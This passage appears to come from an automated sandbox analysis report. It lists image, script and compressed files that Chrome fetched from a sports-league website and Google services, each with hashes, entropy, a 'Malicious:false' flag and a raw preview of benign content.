                                                                                                                          SHA-512:BFF7E8F86BD5E2C6A3AB1465875676A569195360DFBF9056893B55F548B94299B171C3536F17AC34EB1E125A8339D5881521E954A4BA9C79C8D4814ADC7DB6C7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:32975521-f407-1243-8ae0-fd2f2621d81f" xmpMM:DocumentID="xmp.did:7871371BAE3611EE9644800C10B6CFC9" xmpMM:InstanceID="xmp.iid:7871371AAE3611EE9644800C10B6CFC9" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2eae8c94-550d-aa4e-9a26-16186ee9c778" stRef:documentID="adobe:docid:photoshop:70678080-e259-a349-b385-b99feb356496"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2514)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23258
                                                                                                                          Entropy (8bit):5.504597621208854
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:yio8Z2kqX/Qd1jZdiAsoS/bX0K7ejJSijqkpBV5f3dSAYAGucs/0uy4tD9Wy74Rz:yi3AkqX/Qd1jktzX0K7ejAi2+VF3dSsg
                                                                                                                          MD5:64785F81B62786F345764A8D16DC2AA4
                                                                                                                          SHA1:D8F1CCE268693D2FCCA801A01232DE4F6CEC5085
                                                                                                                          SHA-256:165201BD9401B2348DAEACB724E739C22ECC4D1B85757BFEB5ED8D2CE114704C
                                                                                                                          SHA-512:ADA0E6F7DF8F7BA12D71EBD5F03E6B63155A8DE2B35038F756FC326F694D6DB25781B64AC9C131E5CB91935E1E7B601A89230AC116AAB971208619B7F0B007CD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){return a};function ba(a){m.setTimeout(()=>{throw a;},0)};var da,n;a:{for(var ea=["CLOSURE_FLAGS"],p=m,fa=0;fa<ea.length;fa++)if(p=p[ea[fa]],p==null){n=null;break a}n=p}var ha=n&&n[610401301];da=ha!=null?ha:!1;var q;const ia=m.navigator;q=ia?ia.userAgentData||null:null;function ja(a){return da?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function u(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function v(){return da?!!q&&q.brands.length>0:!1}function ka(){return v()?ja("Chromium"):(u("Chrome")||u("CriOS"))&&!(v()?0:u("Edge"))||u("Silk")};function la(a){la[" "](a);return a}la[" "]=function(){};!u("Android")||ka();ka();u("Safari")&&(ka()||(v()?0:u("Coast"))||(v()?0:u("Opera"))||(v()?0:u("Edge"))||(v()?ja("Microsoft Edge"):u("Edg/"))||v()&&ja("Opera"));let ma=void 0;var na=new Set;function oa(a,b=!
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (18300)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):18920
                                                                                                                          Entropy (8bit):5.648118877162723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:byXIWN4tQu5vxh+g+k4Q/NOLxMgTy3e9naesPB8wEy1tj1GKxR:by4ft1N+u/NOOupaeEHPGW
                                                                                                                          MD5:46074F20715B2E1D71813FE06D27F940
                                                                                                                          SHA1:0A1F5FA5E8EE3161EE0A7FCF754FEA35A4D6C3F5
                                                                                                                          SHA-256:19A614A48DD333665E26B26E63AB2174D2C904455065DF375EA23564AA3D6526
                                                                                                                          SHA-512:0A3A595CFD90F343A04FAC3F108CF283F935F8C8FE6C0FF6DBCD581F24F8CD20792EA4097865E69427B95C2DF3060D7CE8E4B9373BD31D787F2CEB8D47E1C02A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/js/bg/GaYUpI3TM2ZeJrJuY6shdNLJBEVQZd83XqI1ZKo9ZSY.js
                                                                                                                          Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var P=function(H){return H},u=this||self,x=function(H,r){if((r=(H=null,u).trustedTypes,!r)||!r.createPolicy)return H;try{H=r.createPolicy("bg",{createHTML:P,createScript:P,createScriptURL:P})}catch(c){u.console&&u.console.error(c.message)}return H};(0,eval)(function(H,r){return(r=x())&&H.eval(r.createScript("1"))===1?function(c){return r.createScript(c)}:function(c){return""+c}}(u)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var g=function(H,r,c,x,y,u,G,D){if(!c.GC&&(u=void 0,r&&r[0]===C&&(H=r[1],u=r[2],r=void 0),y=k(c,84),y.length==0&&(x=k(c,90)>>3,y.push(H,x>>8&255,x&255),u!=void 0&&y.push(u&255)),H="",r&&(r.message&&(H+=r.message),r.stack&&(H+=":"+r.stack)),r=k(c,218),r[0]>3)){c.i=(r=(H=(r[0]-=(H=H.slice(0,(r[0]|0)-3),(H.length|0)+3),i6(H)),c).i,c);try{c.hL?(D=(D=k(c,2))&&D[D.length-1]||95,(G=k
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x410, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60817
                                                                                                                          Entropy (8bit):7.958509702060056
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:ZYeeciS7aQ2PYvyp4NWaakqLR37lWombVaOrhsLo:W1MaQdE4NhakqLRLlm9hsLo
                                                                                                                          MD5:5253271F085DADF8889F2833EE750EC6
                                                                                                                          SHA1:36E4D6D46441518E329B30EEA8A2B5F2DCAE0EBE
                                                                                                                          SHA-256:69323A478A2C6FF018D568E840A7BF2DACFFC376D85890C84398BC8DE00C1058
                                                                                                                          SHA-512:4F8D09B21945AA1FDC0F2E74F1F4C1609EC0822AFBC78F2107DA8D6F0F8F82592DA20621B3BDEC64499240302E37CAA714944147C118CAEE47390929F1ED2F37
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................m............................!1."AQ..a..2Rq......#3BSW.....8TV..$brv...%467Cdu...5EFUcst...&'DG..9Xefw.......................................E..........................!1A..QR...."STaq.....#B..2...35CDbs..r...............?...B+.R+.d ...........3..B.C0....!....H...!.!.@.B..1...~X.Y..!...p."..!.....O,...l..%.?.'...rW4.<...*E.o*..s.t..py..8.9..GO.$..B..I#.(.P......Q.I8..Ts..@..S...Q.U....%[...d..=c.B..#8.. .p..........E9@....a.C..r..1...(|".E@@...+...`...A....N.^Y......".......8..1\...R.`.yEb..o.....1.O2A /..!......Ynm.9%..o(..W>..".4V...TE. ......!.!.@.B......!.!.@.B......!.!.@.B........1....<".L.....@..HE .!...B.... .!...B.B.H...=.S..Tb.rJ~X.J.a..X..R...R..q.`..g.<F\.......yIJy.lT.r1..(..w..9..Y..N.e)Q.$sm....A..8.......x........E..?.=>S........|.u..<....&....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:11:07 11:51:21], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):96174
                                                                                                                          Entropy (8bit):7.812701193033291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:QbDF4ym6mOkQcvbYKMZF4qbxF0iy8ikInI0AsskGh2L3rtwhNSLDtuQ1yk:Q/rm6mGJUqVbRIIbJ0RwHkb7
                                                                                                                          MD5:7F8E9AED6E8C1B57E7C6D54A3D235971
                                                                                                                          SHA1:6B94A1E21E62BA2F18DC6FFE69853CFE2C2D175A
                                                                                                                          SHA-256:88C6E22E7303CC149590718432163C321B761EED21DAFBD5130EBAB3A43E969E
                                                                                                                          SHA-512:6A610FDEAB7AFB3E7C56E5DCD6264F0891D2178835DF495C90896C292CFBBDD01C355A1C3E4BC1C4F93AB8F9229FB842D23627808EE3B3D71AB29CAA2A1E3796
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/15144558/0C9A0952-730x487.jpg
                                                                                                                          Preview:......JFIF............9.Exif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:11:07 11:51:21.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................00..........00..................................................................................................1...........2....... ...4.......@...5.......X.......................2024:11:03 11:07:59.2024:11:03 11:07:59.-05:00..-05:00..-05:00..X.y.@B...T-.@B..................F.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................?5..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 96 x 87, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9377
                                                                                                                          Entropy (8bit):7.9495057295844855
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:wL/peGJrbyQMjcbR68+Ul0xuNJdcBITYc+Mrhc6i3sIAcmWjGTi:wL/Zrb3mI6xUl0CdcSYlsqHsLZZTi
                                                                                                                          MD5:210DEE15F243F18B645718F311EDD373
                                                                                                                          SHA1:397399DE6EACB7C26F979F14AD04BB9D2ECE8CD2
                                                                                                                          SHA-256:7072AF5E02B3554F35CBC9D8523143998E5D1D9074E12F5B66F77C3207CF9338
                                                                                                                          SHA-512:178969FD7AE350918FF06D4E7272B2EE92EB60D10E15E0FE2BD517562E842F07748C747611994C9B65BC07970052EB2CB1EC538DA0D7483C80FA6719FC4E0B57
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...`...W.......@-....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.1/26/16..6....tEXtSoftware.Adobe Fireworks CS6.... .IDATx..]w.]E.~..sn.[. ..B0F.R$.B'.......]...... *E..PD.. -D.-"..D.%.@h!......y.......&.Yy..<.{.o...k3.D...#.}o.'z....{]..5.M...l.6...eSH....K..}......&`C1..js...I.l.p...|&....N;.P..;.*.*..W.=..c.....g.....|Emk...E."..*3..f....G.6m}..l.6..n..L67|O....}(..1[..>n...7..l........._of...S.lLA.V..C,.<........Mc_.c...~i......@.P .!.4......_.?26.t...).<....>.fV.X.A....FYC.U .a...f.t.A.Mko.b.z...*....ExF.......h.?...hk9.../.9.........a.....:./{..q......@...E+P..lQ...#...c._vt..>.....e..v...~w..........)^..u"..T(x.x....X.)*R.G.... .kk>.G..}...M..c...Z]wt..........f....<..YS..-.V..J3..'"V(@^.F.8!.J..&.E"..X..:./..x..C..:}..{...#..69.&N.>...;:Fe.[g._.._..w.M....{*....U.....`s....A.V.....U....baEAl.P.......a.F.E.._....=o.+.W..gYk...y.M.Q9^8....V._,6LR).x..dleS.{8;i.9._w....O.z.I.u.]..e3".....%..%.......o.4..}...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1748)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3596
                                                                                                                          Entropy (8bit):5.444209745064718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:YY7YNYR1m5ABePKTBxj6kDxx12yS1M9O84itGGyBoirdxM6j:t86+A4STflDp9B4YL8oi5xM6j
                                                                                                                          MD5:D92FD68178888768C733A4365A56FC3D
                                                                                                                          SHA1:55916ED75FD5C9DF0A7447298E2BCA559CC9583A
                                                                                                                          SHA-256:E573D7D4E3679F1D578E544C5B807AA4FF21E208BAF12E48AA0D09B2B3938F04
                                                                                                                          SHA-512:37CAEE932A7038636D84720960420E701C7659C873188CA400EE0196868D9C5A09BB31F566699ACF54DB0F0FC42BD769F1A141A213C2127C38CE839DACCA8BE5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var e=this||self;/* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ .var f={};function g(){if(f!==f)throw Error("Bad secret");};function h(a){return Object.isFrozen(a)&&Object.isFrozen(a.raw)}function k(a){return a.toString().indexOf("`")===-1}const l=k(a=>a``)||k(a=>a`\0`)||k(a=>a`\n`)||k(a=>a`\u0000`),m=h``&&h`\0`&&h`\n`&&h`\u0000`;let n=globalThis.trustedTypes,p;function q(){let a=null;if(!n)return a;try{const b=d=>d;a=n.createPolicy("goog#html",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){throw b;}return a};var r=class{constructor(a){g();this.g=a}toString(){return this.g+""}};function t(a){p===void 0&&(p=q());var b=p;return new r(b?b.createScriptURL(a):a)};var v=class{constructor(a){g();this.h=a}toString(){return this.h}};new v("about:blank");new v("about:invalid#zClosurez");const w=[];var x=a=>{console.warn(`A URL with content '${a}' was sanitized away.`)};w.ind
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2198
                                                                                                                          Entropy (8bit):4.887702788804177
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gNMXECoKm0LylKm9+ySCwZHPJYMjOQ8kX6r9hgOqpoLOZV6:geZMQI+xNvnLX6r96OH
                                                                                                                          MD5:83A5704F7F896761846735075AE38FC4
                                                                                                                          SHA1:C00977191E37BC930F3DC19E63208BCBDE877EF2
                                                                                                                          SHA-256:10637FCFFC31C3FDA17C64BA0071528F0BA8C65FFFEE6DCD8EFE130BE4D4B75D
                                                                                                                          SHA-512:1F9828EB9ACA647FE233B30E66925DFBE479C1D52965769F455E4B0E41DE566B705A27590044E1DB78FC2CF466D318AF3884D3CEDDF176D9FD0FEA73FB1BC02C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*globals jQuery, icl_vars */..(function () {.."use strict";...jQuery(document).ready(function () {...jQuery('#lang_sel a, #lang_sel_footer a, .menu-item-language a').on('click', function (event) {.....var originalUrl;....var currentUrl = window.location.href;....var targetUrl = jQuery(this).attr('href');.....if ('#' !== targetUrl && currentUrl !== targetUrl) {.....event.preventDefault();......originalUrl = jQuery(this).attr('href');.....// Filter out xdomain_data if already in the url.....originalUrl = originalUrl.replace(/&xdomain_data(=[^&]*)?(?=&|$)|xdomain_data(=[^&]*)?(&|$)/, '');.....originalUrl = originalUrl.replace(/\?$/, '');....../** @namespace icl_vars.current_language */.....jQuery.ajax({......url: icl_vars.ajax_url,......type: 'post',......dataType: 'json',......data: {.......action: 'switching_language',.......from_language: icl_vars.current_language......},......success: function (response) {.......var argsGlue;.......var url;.......var hash;.......
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):37617
                                                                                                                          Entropy (8bit):7.990058953921499
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:RYlYscYhaiMbY6ZncqOkiCN04TK5Qnw7Hajd3vKryALmw:8hxMbY6Zn/OdCN04TJoN
                                                                                                                          MD5:2B7DDF13394BACB8002713D2390B2304
                                                                                                                          SHA1:860EFFCD7FA4A1D4EFCCDF374135D93ACE179E7B
                                                                                                                          SHA-256:2D8DB4973897816579E0785A0100A1B5E5BB5C63C3814D8EAD17A1CDA35FB11F
                                                                                                                          SHA-512:5B378D9BBB85E62EA769E26D61CDFA7A466910CF6FF391A217A97C8E83A357C3A664F7B17B9B0B89D759FA00F66F5B55E5DFB7999307ACA1263DD723622322E3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(./..X|....8*C0..9..@..H..|4..........$uK..>..$r.).c...t..R....<.~...M................X....8Xh....c9.O..8...."..`...*..p.o. ....q>.c]..V<..n$.f..\......@.:lP.1.._;.{...{^....}aj9..8r..L.q...A.`..U....\)Gg.vY.BO..P.8.(.....".i.H..(...Sf)..B.......i...u2..y".z.[Mam.W.......yrN...[.1....i...6...Bm.M.)....i(..i......].#5...0lp...m.P.C.r...P. .pQ.D...&".F..A.u&.......L&.`.L....$H"..!.!>....-.."."h..3...X2...TL....i.+..H.>8z;...4........g2....*.y...r..W.I)L~.j7(M#....:.)?..2.P...w.....H$..g.:.y(g.d.w.XZ..q...5......R^..>.F..../.n#-........e.L...<..y....|...........C.v.=.h~h...N.....t~...q5)..F"..h..m.(../B.5Xb~.m$.4Q.A...p.\]p.H.E....Y.+~.|...Z.cx..4...{.5.OK.o.S:...=...B.C.h......b.vQ../S.i.ru.^..2.'......."....J.'..R{......y......OjI`kae._.Z..d....*..7.l.T..V.O..}..@....@...ma.~ma<..V...}.x....5....J.|.k..LUy....8!....D.~{...'..?H.h."..!~..h>...A.....(W...la8..b..45}..B@2.ft/.| ..[.|S.kj.'.$".,..\]....K....I7..........-.r!......p0.v.1)..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5522
                                                                                                                          Entropy (8bit):7.959071521447741
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:C4gcLxrUpMzQSARsKZbV7uAG4TsfhPEJnoZjgH8Y5n1RE2ZFz0cCagC+x:hgcLxrNACKNV7uAfW8i5K/ZFzMa8x
                                                                                                                          MD5:E7C52668DD4A1B04A27F6413B4F381AC
                                                                                                                          SHA1:CA8B6ECF078C9F204C3AF3EA71B695D953B30947
                                                                                                                          SHA-256:A37C515298626E380A4D02452AEDA968E6A80FC4BE4CBD042D5C9A61BA119EEE
                                                                                                                          SHA-512:E2B519D0752CF086AF729892233A2AB9D7C4DD68A3802C13947C9DE2EB38B637FC0CFE68977E12370461984A0DF46760E5F1729A3299E9536EFCD1FD002D8CE3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://static.ctctcdn.com/js/signup-form-widget/current/signup-form-widget.css
                                                                                                                          Preview:(./..X-...m..*.R..@.C.NIB.y.[.".....Ed..*....*".....c.^....."..%..s....g.<z.H.i -y..wj.m.....%.~..?.....q0..a...G.}f.n%...Eb!I...E.'l}(.v...(.>.7.`.R.h.A.h.....S....0z.qncD...)......?.,y.T...WR.._$.r~.5...K.T...8DD..Xy._E..v9D.xj..}..}}*..lwE.>..;.(....#~.@....'..b...=.Hu.B'..,.>?I...M..&...d'..G.].]...&...E..\Ju.B).Y5Jz..!..%=b.9.v..q,....pJ.(..+.i..."-......o.!u..i2......).&.!7....`...U.>d)...r..):'C'.).O.\yV..R.<.l.==.@..Z.....E.p_z...J;'G..%C.I...O...Oh#.0M.!B.....K..zXv......>..{zTe.|..=...0.Y..i.....G.8~..c..xR<..N..S.....Z..uJ....2E!O...)c.s..U.v2...S.a..&...c`2..O..E...p.A..p.+.c\.M.1.Q4.P..!.*^.H#..r .6....iC..0..}.S...H...ZJ2.}..T.MA.......G.q,....\O.y0&(..7.J..x,...GU..O....^.`....l......q1.b..HTKT...O...Jo.(`.....*m...I~.h.FF'...p.8..O..?Nn...).bYB.I.<5..........(.8.Wm.n.....C..w..."".8~..v.x2q....hb.....>5..$G.l.S..[.r....<.t.o...Jq....ZeH.k.N...z..3.>.r...\.....s6...+(.<.....v.....|j..C....[....~V.H1{..7..C.MA.L .T..t4.....(.(....X..8
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1434
                                                                                                                          Entropy (8bit):5.765556935416344
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtFtD1INxsLqJ:VKEctKo7LmvtUjPKtX7ftD1INOLrwUnG
                                                                                                                          MD5:764EE6309BF4800054E4A2A67DEB3575
                                                                                                                          SHA1:2FFD2FDA8E49AD861B75DE1E5ED583D8CE1D5B0A
                                                                                                                          SHA-256:652E8677AEC33767D2A5F229384F79B4F526104BF7E94D7D258070F94743C3CC
                                                                                                                          SHA-512:4333F5A85D3085C54ACF34632CFDD57CF7EEA2D539C5CEFC1DBD07A6486083CAC1C1DA6BADB9743FD01BCDEE63AEFB187074A6BF7AB945BC897E227E1C4F5C6D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2228
                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):54810
                                                                                                                          Entropy (8bit):7.974013751861199
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:w9hfGpUyegCDWc/lIVqCQI2qxMxSQk421wdjxze:WfGszDWc/JI2oMljAwj1e
                                                                                                                          MD5:EE4428F72F40A9CD584A971CFC0A3999
                                                                                                                          SHA1:F75C7F4EA031B3904C6505B20F608CF1A205917B
                                                                                                                          SHA-256:83C3A796A335CBF3C2E78B341110E8CA0332F1E2179B04E374822CC2A496FB66
                                                                                                                          SHA-512:5D5B6CA10EA2BD515214A6A5288D11C3182D5450E9739B9A9FC7D1169F8C3FA9E68201C9ADA32382BC96A5E29DA42E6AAEAA64687BBE8F07825DD07B9ED0748B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/13092716/25-TP-Game-Move-1600x900-Web-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................Y..........................!1..AQ."a.2q...#BR..3.$CSbr...%4......DTcs...&5d....'Et...Ue..................................F........................!1.A..Q...."2aq....BR......#Cb..$3DSr..%T..............?..q.U.o<=E.g.....iK.<n.>U.'....\..s.S...#i......!'.. H.W65...........!q...M.C.@)..".X$\.4b...XC...6.xpv...)..^..iM.2.........&...-kB...-....+z.`....a....){.f9....y.L.....J"..M..j:..4...n..(.z......?........Tk......R[.2-.X......X.A$d..4...&....j.OJl%Z..TC..<:..f..0..f..".L....G..@.!...)..H.2..`..I'#I.(w...HE..@.UK.9*.u.*..m..#v.~..=".0]Q n..|<.._.....W.`.!.D..A..!.. ./m .m.Rl<.H:$k.....A...t....X...R.m.=.t@.Z.h-z..B....X..`....K..o.......?.=Q....."..]..-_H:.F.W..CO..."....G...H".~..eCq.k...YQ ..h`.{.....r..I..R.H..q.P7Q*.>j.^J.....R_.ayT2/...1g>.i.C..z.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65724
                                                                                                                          Entropy (8bit):7.970053871178775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:jrpN3wNlZyG/8NAjvo1NgVrFDLHwzuVc11+Q:HpN3wxyejg1Nm4zu+b+Q
                                                                                                                          MD5:D47BF6F189B1305801E65B70197EAF75
                                                                                                                          SHA1:0CE67B6C30B37386C2848D8DDCFE979E4C3C5D77
                                                                                                                          SHA-256:73069711AC5EC4117412964A29908664C8288EB06A4EE97690C640E2C7698EFD
                                                                                                                          SHA-512:BD8B5289DB8136523AD9D4C754841F1E09CD75D8F668A800A2F58929BC0F898A78617F9D52E26859F903A89AFCB97556B97AA71D0422C5FB1BF9654219FDF020
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................h..........................!1.AQ.."aq.2....#BR..b...$3r...CScs.....%5..'467ETdu..&(DFfv....8UVetw......................................C........................!1..AQ.."2aq....R...#3BS...$......%4C.s..............?...RoJ5f.......I*...P.E.J/s..=tP..3..A..z<....&3*.V.f..m..4Z{./.w.r...FK.H..HJ.fB..+..[...IB.t,e..m ...s..i9Rt...P.....r........r.r...U..a.2.M........n.P..".....y:.BN.+.h......>.^...>.......F......W..B...>pqa.k.....H.;\.9..k7....{B..x.......I*.[./.E.....NI.Yrrl..H...R.:.........O..)[....tKK}...9m........9z..4.C......E..P..)W...'M.....f^m...SWJ..I.L.......r.@.3.M.b.i..5n......U.W.....S......IU.B.d.mO().W.;1J.....`u.., ...M..lH6.K.X...J.!..........)......aF.i.r..na+..,..H.!.\]I.*"...BD$]ZF...2.-.g_8b.Q..4q(x..o.8*.M.E..u..*..v..@.$.^.E ....zG$.n
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):102
